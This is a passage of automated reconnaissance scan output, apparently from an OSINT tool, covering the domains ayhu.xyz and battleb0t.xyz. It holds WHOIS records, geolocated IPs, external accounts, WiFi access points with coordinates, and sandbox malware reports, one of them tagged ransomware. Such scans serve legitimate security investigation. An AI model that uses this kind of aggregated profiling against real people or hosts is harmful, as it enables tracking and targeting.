Admin Fax Ext:
Admin Email: a922252a687d4937a189d1d7289125ed.protect@withheldforprivacy.com
Registry Tech ID:
Tech Name: Redacted for Privacy
Tech Organization: Privacy service provided by Withheld for Privacy ehf
Tech Street: Kalkofnsvegur 2
Tech City: Reykjavik
Tech State/Province: Capital Region
Tech Postal Code: 101
Tech Country: IS
Tech Phone: +354.4212434
Tech Phone Ext:
Tech Fax:
Tech Fax Ext:
Tech Email: a922252a687d4937a189d1d7289125ed.protect@withheldforprivacy.com
Name Server: dns1.registrar-servers.com
Name Server: dns2.registrar-servers.com
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-12T00:12:14.09Z <<<
For more information on Whois status codes, please visit https://icann.org/epp |
| 2023-05-12 03:09:18 | Vulnerability - General | Yes | Tool - Retire.js | 0 | 0 | 4 | 0 | None | Bootstrap before 4.0.0 is end-of-life and no longer maintained.
Severity: low
Info: https://github.com/twbs/bootstrap/issues/20631 | https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js |
| 2023-05-12 03:08:55 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 34.74.170.80 | 34.74.170.74 |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | zoom (Net ID: 00:01:38:44:83:6D) | 34.0544, -118.244 |
| 2023-05-12 02:54:07 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 2606:4700:3031::ac43:8709:443 | 2606:4700:3031::ac43:8709 |
| 2023-05-12 02:45:44 | Raw Data from RIRs | No | AbstractAPI | 0 | 0 | 2 | 0 | None | {u'city': u'Chantilly', u'security': {u'is_vpn': False}, u'city_geoname_id': 4751935, u'region_geoname_id': 6254928, u'country': u'United States', u'region': u'Virginia', u'connection': {u'connection_type': u'Corporate', u'autonomous_system_organization': u'FASTLY', u'isp_name': u'American Registry Internet Numbers', u'organization_name': u'American Registry Internet Numbers', u'autonomous_system_number': 54113}, u'continent_code': u'NA', u'currency': {u'currency_name': u'USD', u'currency_code': u'USD'}, u'flag': {u'svg': u'https://static.abstractapi.com/country-flags/US_flag.svg', u'png': u'https://static.abstractapi.com/country-flags/US_flag.png', u'unicode': u'U+1F1FA U+1F1F8', u'emoji': u'\U0001f1fa\U0001f1f8'}, u'postal_code': u'20151', u'longitude': -97.822, u'country_code': u'US', u'timezone': {u'abbreviation': u'CDT', u'gmt_offset': -5, u'is_dst': True, u'name': u'America/Chicago', u'current_time': u'21:45:43'}, u'latitude': 37.751, u'country_geoname_id': 6252001, u'continent_geoname_id': 6255149, u'country_is_eu': False, u'ip_address': u'2606:50c0:8002::153', u'continent': u'North America', u'region_iso_code': u'VA'} | 2606:50c0:8002::153 |
| 2023-05-12 03:23:02 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | Revolut (Category: finance)
https://revolut.me/ayhu | ayhu |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | wireless (Net ID: 00:01:36:06:1C:1A) | 52.3759, 4.8975 |
| 2023-05-12 03:00:45 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.58): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | speedrun (Category: gaming)
https://www.speedrun.com/user/login/ | login |
| 2023-05-12 03:03:41 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 010pixel.github.io |
| 2023-05-12 03:03:59 | Co-Hosted Site | No | ThreatMiner | 0 | 0 | 2 | 0 | None | scoop.sh | 185.199.109.153 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | Elijah Sadee (Net ID: 00:1D:D3:6D:1D:D0) | 32.8608, -79.9746 |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | Ziggo1 (Net ID: 00:02:6F:D8:57:09) | 50.8897, 6.0563 |
| 2023-05-12 03:33:38 | Raw File Meta Data | No | Binary String Extractor | 0 | 0 | 4 | 0 | None | cHRM
| https://pics.battleb0t.xyz/images/favicon.png |
| 2023-05-12 02:54:13 | HTTP Status Code | No | Web Spider | 0 | 0 | 3 | 0 | None | 200 | https://battleb0t.xyz/main.built.js |
| 2023-05-12 02:45:58 | Raw Data from RIRs | No | AbstractAPI | 0 | 0 | 3 | 0 | None | {u'city': u'Frankfurt am Main', u'security': {u'is_vpn': False}, u'city_geoname_id': 2925533, u'region_geoname_id': 2905330, u'country': u'Germany', u'region': u'Hesse', u'connection': {u'connection_type': u'Corporate', u'autonomous_system_organization': u'DIGITALOCEAN-ASN', u'isp_name': u'DigitalOcean', u'organization_name': u'DigitalOcean, LLC', u'autonomous_system_number': 14061}, u'continent_code': u'EU', u'currency': {u'currency_name': u'Euros', u'currency_code': u'EUR'}, u'flag': {u'svg': u'https://static.abstractapi.com/country-flags/DE_flag.svg', u'png': u'https://static.abstractapi.com/country-flags/DE_flag.png', u'unicode': u'U+1F1E9 U+1F1EA', u'emoji': u'\U0001f1e9\U0001f1ea'}, u'postal_code': u'60313', u'longitude': 8.6843, u'country_code': u'DE', u'timezone': {u'abbreviation': u'CEST', u'gmt_offset': 2, u'is_dst': True, u'name': u'Europe/Berlin', u'current_time': u'04:45:57'}, u'latitude': 50.1188, u'country_geoname_id': 2921044, u'continent_geoname_id': 6255148, u'country_is_eu': True, u'ip_address': u'64.226.81.43', u'continent': u'Europe', u'region_iso_code': u'HE'} | 64.226.81.43 |
| 2023-05-12 02:46:49 | SSL Certificate - Issued by | No | SSL Certificate Analyzer | 0 | 0 | 3 | 0 | None | C=US,O=DigiCert Inc,CN=DigiCert TLS Hybrid ECC SHA384 2020 CA1 | 104.196.30.220 |
| 2023-05-12 02:44:20 | Co-Hosted Site - Domain Name | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | githubusercontent.com | 185.199.110.153 |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | 1620 Guest (Net ID: 00:01:21:30:37:50) | 52.3759, 4.8975 |
| 2023-05-12 03:41:52 | Physical Location | No | Censys | 0 | 0 | 3 | 0 | None | Frankfurt am Main, Hesse, 60306, Germany, Europe | 45.131.109.53 |
| 2023-05-12 03:00:55 | Co-Hosted Site | No | HackerTarget | 3 | 0 | 2 | 0 | None | 00ffcc.cn | 185.199.111.153 |
| 2023-05-12 02:44:28 | Affiliate - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | netlify.app | frabjous-lebkuchen-324004.netlify.app |
| 2023-05-12 02:54:44 | BGP AS Membership | No | Censys | 0 | 0 | 3 | 0 | None | 396982 | 35.229.48.116 |
| 2023-05-12 02:55:34 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'http://bouncefitness.precisiongroup.com.au/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_344_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "UpdatingNewTabPageData"\n "IsoScope_344_IESQMMUTEX_0_331"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "IsoScope_344_IESQMMUTEX_0_519"\n "Local\\ZonesCacheCounterMutex"\n "IsoScope_344_IESQMMUTEX_0_303"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_836"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\ZonesLockedCacheCounterMutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "IsoScope_344_IE_EarlyTabStart_0xbac_Mutex"\n "IsoScope_344_ConnHashTable<836>_HashTable_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_836"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"104.21.6.166:80"\n 
"104.21.6.166:443"\n "142.250.189.202:443"\n "172.217.12.104:443"\n "172.217.164.99:443"\n "142.251.46.174:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"bouncefitness.precisiongroup.com.au"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"bouncefitness.precisiongroup.com.au"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'"* Copyright 2011-2016 Twitter, Inc." 
(Indicator: "twitter")\n "<a class="elementor-icon elementor-social-icon elementor-social-icon-twitter elementor-repeater-item-37c2364" target="_blank">" (Indicator: "twitter")\n "<i class="fab fa-twitter"></i></a>" (Indicator: "twitter")\n "<noscript><style id="rocket-lazyload-nojs-css">.rll-youtube-player, [data-lazy-src]{display:none !important;}</style></noscript>" (Indicator: "youtube")\n "<span class="elementor-screen-only">Twitter</span>" (Indicator: "twitter")\n "function Ey(a,b){var c=this;return b}Ey.O="internal.enableAutoEventOnScroll";var cc=fa(["data-gtm-yt-inspected-"]),Fy=["www.youtube.com","www.youtube-nocookie.com"],Gy,Hy=!1;" (Indicator: "youtube")\n "function Ry(a,b){var c=this;return b}Ry.O="internal.enableAutoEventOnYouTubeActivity";var Sy;function Ty(a){var b=!1;return b}Ty.O="internal.evaluateMatchingRules";" (Indicator: "youtube")\n "transportUrl:b,context:c},Q(91);else{var f="/gtag/destination?id="+encodeURIComponent(a)+"&l="+Qh.ka+"&cx=c";cs()&&(f+="&sign="+Qh.ue);var g=fi||hi?bs(b,f):void 0;g||(g=Po("https://","http://",Qh.Jd+f));Rl().destination[a]={state:1,context:c};mc(g)}};function ds(){if(vl()){return!0}return!1};var gs=new RegExp(/^(.*\\.)?(google|youtube|blogger|withgoogle)(\\.com?)?(\\.[a-z]{2})?\\.?$/),hs={cl:["ecl"],customPixels:["nonGooglePixels"],ecl:["cl"],ehl:["hl"],hl:["ehl"],html:["customScripts","customPixels","nonGooglePixels","nonGoogleScripts","nonGoogleIframes"],customScripts:["html","customPixels","nonGooglePixels","nonGoogleScripts","nonGoogleIframes"],nonGooglePixels:[],nonGoogleScripts:["nonGooglePixels"],nonGoogleIframes:["nonGooglePixels"]},is={cl:["ecl"],customPixels:["customScripts","html"]," (Indicator: "youtube")'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': 
u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "KFOlCnqEu92Fr1MmEU9fBBc-_1_.woff" has type "Web Open Font Format TrueType length 20544 version 1.1"- [targetUID: N/A]\n "~DFAE12B4DD5D9EF57E.TMP" has type "data"- Location: [%TEMP%\\~DFAE12B4DD5D9EF57E.TMP]- [targetUID: 00000000-00000836]\n "lazyload.min_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "548YBEKT.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\548YBEKT.txt]- [targetUID: 00000000-00002848]\n "solid.min_1_.css" has type "ASCII text with very long lines"- [targetUID: N/A]\n "P8ST09HS.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\P8ST09HS.txt]- [targetUID: 00000000-00000836]\n "style.min_1_.css" has type "UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "preloaded-elements-handlers.min_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "webpack.runtime.min_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "search_2_.json" has type "JSON data"- [targetUID: N/A]\n "frontend-modules.min_1_.js" has type "UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "_17DA973C-BEDC-11ED-8783-080027090D53_.dat" has type "Composite Document File V2 Document Cannot read short stream"- [targetUID: N/A]\n "animations.min_1_.css" has type "ASCII text with very long lines"- [targetUID: N/A]\n "waypoints.min_1_.js" has type "ASCII text with very long lines with no line terminators"- [targetUID: N/A]\n "post-1477_1_.css" has type "ASCII text with very 
long lines with no line terminators"- [targetUID: N/A]\n "wp-polyfill.min_1_.js" has type "UTF-8 Unicode text with very long lines with no line terminators"- [targetUID: N/A]\n "bounce_logo_2_.png" has type "PNG image data 264 x 130 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "swiper.min_1_.css" has type "ASCII text with very long lines with no line terminators"- [targetUID: N/A]\n "flexslider_1_.css" has type "ASCII text with very long lines with no line terminators"- [targetUID: N/A]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Heuristic match: "\ufffd\ufffd3>q\ufffd\ufffd[>\ufffd\ufffdd\ufffd*CgY\ufffdI\u043b\ufffd\xb9*\ufffdS\ufffdS\ufffd=\ufffd:\ufffdw\ufffdb/~\ufffd\ufffd\ufffd\ufffd?<<\ufffd{\ufffdT \ufffd\ufffdM\ufffdZ0\ufffd\ufffd\ufffdF\ufffd,\ufffdU\ufffd]\ufffd\ufffdtll\ufffdM\ufffd\ufffd[\ufffd\ufffd\u06be\ufffd\ufffd\ufffddz\ufffd\ufffd;\ufffd7\ufffd\ufffdN\ufffd\ufffd\ufffd\ufffd\ufffdw\ufffdn#\ufffd\ufffdN>@)mN\ufffd?>\ufffd\ufffd\ufffd\u0785R\ufffd\ufffd`\uac7e\ufffdQ\ufffd$z/\ufffd2\ufffd\ufffdx\ufffdM\ufffdG\ufffdk\ufffdf6Ip\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffdg\ufffd\ufffdnX4d\ufffd\ufffd\ufffde.0.\ufffd\ufffd\ufffd!/\ufffd\ufffd\ufffd\ufffd^\ufffd=z\ufffd5\ufffd\ufffd\ufffd\ufffd\'\ufffdhCh\ufffd7\ufffd\u0290\ufffd\ufffd\ufffd\ufffdj\ufffd:\u0760\ufffd\u059eUP?\ufffd\ufffdU\ufffdH+h\ueb420\ufffd\ufffd\ufffd\ufffd\ufffd[\ufffdh\ufffd3D\ufffd\ufffd*\ufffdS\ufffdzWAD7!\ufffd>\ufffdd\ufffdBhm\ufffd{fK\ufffdz\ufffd\ufffd"\n Pattern match: "T.HZ/1\ufffd\ufffd\ufffd\ufffd\ufffdb\u02ca\ufffd1"\n Pattern match: "https://twitter.com/intent/tweet?text={text"\n Pattern match: "https://+a+.google-analytics.com/g/collect},IA=function(){var"\n Pattern match: 
"http://www.w3.org/2000/svg,svg"\n Pattern match: "https://cct.google/taggy/agent.js"\n Pattern match: "http://getbootstrap.com"\n Pattern match: "https://fontawesome.com"\n Pattern match: "http://api.jqueryui.com/position/"\n Pattern match: "http://jquery.org/license"\n Pattern match: "http://jqueryui.com"\n Pattern match: "http://swiperjs.com"\n Pattern match: "https://fontawesome.com/license/free"\n Pattern match: "https://github.com/twbs/bootstrap/blob/master/LICENSE"\n Pattern match: "http://www.w3.org/2000/svg"\n Pattern match: "http://jqueryui.com*"\n Pattern match: "github.com/necolas/normalize.css"\n Pattern match: "https://github.com/h5bp/html5-boilerplate/blob/master/src/css/main.css"\n Pattern match: "https://wp-rocket.me"\n Pattern match: "https://fonts.googleapis.com/css?family=Roboto%3A100%2C100italic%2C200%2C200italic%2C300%2C300italic%2C400%2C400italic%2C500%2C500italic%2C600%2C600italic%2C700%2C700italic%2C800%2C800italic%2C900%2C900italic%7CRoboto%20Slab%3A100%2C100italic%2C200%2C200it"\n Pattern match: "https://bouncefitness.precisiongroup.com.au/"\n Pattern match: "https://bouncefitness.precisiongroup.com.au/my-account/"\n Pattern match: "http://www.w3.org/2000/svg\'%20view | 104.21.6.166 |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | 089070 (Net ID: 00:02:2D:08:90:70) | 37.780462,-122.390564 |
| 2023-05-12 03:33:40 | Raw File Meta Data | No | Binary String Extractor | 0 | 0 | 4 | 0 | None | [binary string dump omitted] | https://pics.battleb0t.xyz/images/ein_1.png |
| 2023-05-12 02:53:15 | IPv6 Address | No | Mnemonic PassiveDNS | 0 | 0 | 1 | 0 | None | 2606:4700:3037::6815:470e | battleb0t.xyz |
| 2023-05-12 02:58:35 | Phone Number | No | Phone Number Extractor | 5 | 0 | 2 | 0 | None | +14806242505 | Domain Name: AYHU.XYZ
Registry Domain ID: D338262912-CNIC
Registrar WHOIS Server: whois.godaddy.com
Registrar URL: https://www.godaddy.com/
Updated Date: 2023-01-27T12:12:18.0Z
Creation Date: 2022-12-13T18:01:25.0Z
Registry Expiry Date: 2023-12-13T23:59:59.0Z
Registrar: Go Daddy, LLC
Registrar IANA ID: 146
Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Registrant Organization: Domains By Proxy, LLC
Registrant State/Province: Arizona
Registrant Country: US
Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: BRETT.NS.CLOUDFLARE.COM
Name Server: LEANNA.NS.CLOUDFLARE.COM
DNSSEC: unsigned
Billing Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registrar Abuse Contact Email: abuse@godaddy.com
Registrar Abuse Contact Phone: +1.4805058800
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T02:44:06.0Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
>>> IMPORTANT INFORMATION ABOUT THE DEPLOYMENT OF RDAP: please visit
https://www.centralnic.com/support/rdap <<<
The Whois and RDAP services are provided by CentralNic, and contain
information pertaining to Internet domain names registered by our
our customers. By using this service you are agreeing (1) not to use any
information presented here for any purpose other than determining
ownership of domain names, (2) not to store or reproduce this data in
any way, (3) not to use any high-volume, automated, electronic processes
to obtain data from this service. Abuse of this service is monitored and
actions in contravention of these terms will result in being permanently
blacklisted. All data is (c) CentralNic Ltd (https://www.centralnic.com)
Access to the Whois and RDAP services is rate limited. For more
information, visit https://registrar-console.centralnic.com/pub/whois_guidance.
Domain Name: ayhu.xyz
Registry Domain ID: D338262912-CNIC
Registrar WHOIS Server: whois.godaddy.com
Registrar URL: https://www.godaddy.com
Updated Date: 2022-12-13T18:01:26Z
Creation Date: 2022-12-13T18:01:25Z
Registrar Registration Expiration Date: 2023-12-13T23:59:59Z
Registrar: GoDaddy.com, LLC
Registrar IANA ID: 146
Registrar Abuse Contact Email: abuse@godaddy.com
Registrar Abuse Contact Phone: +1.4806242505
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Registry Registrant ID: CR599348184
Registrant Name: Registration Private
Registrant Organization: Domains By Proxy, LLC
Registrant Street: DomainsByProxy.com
Registrant Street: 2155 E Warner Rd
Registrant City: Tempe
Registrant State/Province: Arizona
Registrant Postal Code: 85284
Registrant Country: US
Registrant Phone: +1.4806242599
Registrant Phone Ext:
Registrant Fax: +1.4806242598
Registrant Fax Ext:
Registrant Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=ayhu.xyz
Registry Admin ID: CR599348186
Admin Name: Registration Private
Admin Organization: Domains By Proxy, LLC
Admin Street: DomainsByProxy.com
Admin Street: 2155 E Warner Rd
Admin City: Tempe
Admin State/Province: Arizona
Admin Postal Code: 85284
Admin Country: US
Admin Phone: +1.4806242599
Admin Phone Ext:
Admin Fax: +1.4806242598
Admin Fax Ext:
Admin Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=ayhu.xyz
Registry Tech ID: CR599348185
Tech Name: Registration Private
Tech Organization: Domains By Proxy, LLC
Tech Street: DomainsByProxy.com
Tech Street: 2155 E Warner Rd
Tech City: Tempe
Tech State/Province: Arizona
Tech Postal Code: 85284
Tech Country: US
Tech Phone: +1.4806242599
Tech Phone Ext:
Tech Fax: +1.4806242598
Tech Fax Ext:
Tech Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=ayhu.xyz
Name Server: BRETT.NS.CLOUDFLARE.COM
Name Server: LEANNA.NS.CLOUDFLARE.COM
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-12T02:44:06Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
TERMS OF USE: The data contained in this registrar's Whois database, while believed by the
registrar to be reliable, is provided "as is" with no guarantee or warranties regarding its
accuracy. This information is provided for the sole purpose of assisting you in obtaining
information about domain name registration records. Any use of this data for any other purpose
is expressly forbidden without the prior written permission of this registrar. By submitting
an inquiry, you agree to these terms and limitations of warranty. In particular, you agree not
to use this data to allow, enable, or otherwise support the dissemination or collection of this
data, in part or in its entirety, for any purpose, such as transmission by e-mail, telephone,
postal mail, facsimile or other means of mass unsolicited, commercial advertising or solicitations
of any kind, including spam. You further agree not to use this data to enable high volume, automated
or robotic electronic processes designed to collect or compile this data for any purpose, including
mining this data for your own personal or commercial purposes. Failure to comply with these terms
may result in termination of access to the Whois database. These terms may be subject to modification
at any time without notice.
|
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | SX5515724F5 (Net ID: 00:01:E3:57:24:F5) | 52.3759, 4.8975 |
| 2023-05-12 02:46:25 | SSL Certificate - Raw Data | No | Certificate Transparency | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:4a:0e:8c:1b:d3:a5:34:69:b6:32:8e:46:29:d8:95:17:d9
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Nov 17 09:44:04 2022 GMT
Not After : Feb 15 09:44:03 2023 GMT
Subject: CN=panel.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
40:6C:27:E5:F5:7A:53:84:B0:9C:FE:C0:1C:53:80:B3:F8:A3:C2:C8
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:panel.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 7A:32:8C:54:D8:B7:2D:B6:20:EA:38:E0:52:1E:E9:84:
16:70:32:13:85:4D:3B:D2:2B:C1:3A:57:A3:52:EB:52
Timestamp : Nov 17 10:44:05.080 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : AD:F7:BE:FA:7C:FF:10:C8:8B:9D:3D:9C:1E:3E:18:6A:
B4:67:29:5D:CF:B1:0C:24:CA:85:86:34:EB:DC:82:8A
Timestamp : Nov 17 10:44:05.107 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
Signature Algorithm: sha256WithRSAEncryption
| battleb0t.xyz |
| 2023-05-12 03:00:53 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 000000jihyun.github.io | 185.199.111.153 |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | FRBEACH (Net ID: 00:02:2D:8A:07:06) | 34.0544, -118.244 |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | myLGNetCBD2 (Net ID: 00:01:36:59:CB:D0) | 37.7813933,-122.3918002 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | championat (Category: news)
https://www.championat.com/user/login/ | login |
| 2023-05-12 02:45:11 | Physical Location | No | ipapi.co | 0 | 0 | 2 | 0 | None | Toronto, Ontario, ON, Canada, CA | 172.67.135.9 |
| 2023-05-12 02:54:18 | Linked URL - Internal | No | Web Spider | 4 | 0 | 3 | 0 | None | https://pics.battleb0t.xyz/gallery.css | https://pics.battleb0t.xyz/ |
| 2023-05-12 02:55:28 | Linked URL - Internal | No | URLScan.io | 0 | 0 | 2 | 0 | None | https://kekw.battleb0t.xyz/jar | kekw.battleb0t.xyz |
| 2023-05-12 03:16:17 | Similar Domain | Yes | Tool - DNSTwist | 1 | 0 | 1 | 0 | None | ayha.xyz | ayhu.xyz |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | EWireless (Net ID: 00:06:25:B0:C4:C9) | 39.0469, -77.4903 |
| 2023-05-12 02:54:54 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [u'ransomware'], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'http://bcpzonasegurabeta.viabcp.com', u'type': u'extracted', u'verdict': u'malicious'}]}, u'total_processes': 15, u'threat_score': 97, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'VM-806670.html', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:1572:120:WilError_01"\n "Local\\SM0:1572:120:WilError_01"\n "Local\\SM0:1572:304:WilStaging_02"\n "ChromeProcessSingletonStartup!"\n "SM0:1572:304:WilStaging_02"\n "SM0:1572:120:WilError_01"\n "\\Sessions\\1\\BaseNamedObjects\\SM0:1572:120:WilError_01"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:1572:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\SM0:1572:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\ChromeProcessSingletonStartup!"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', 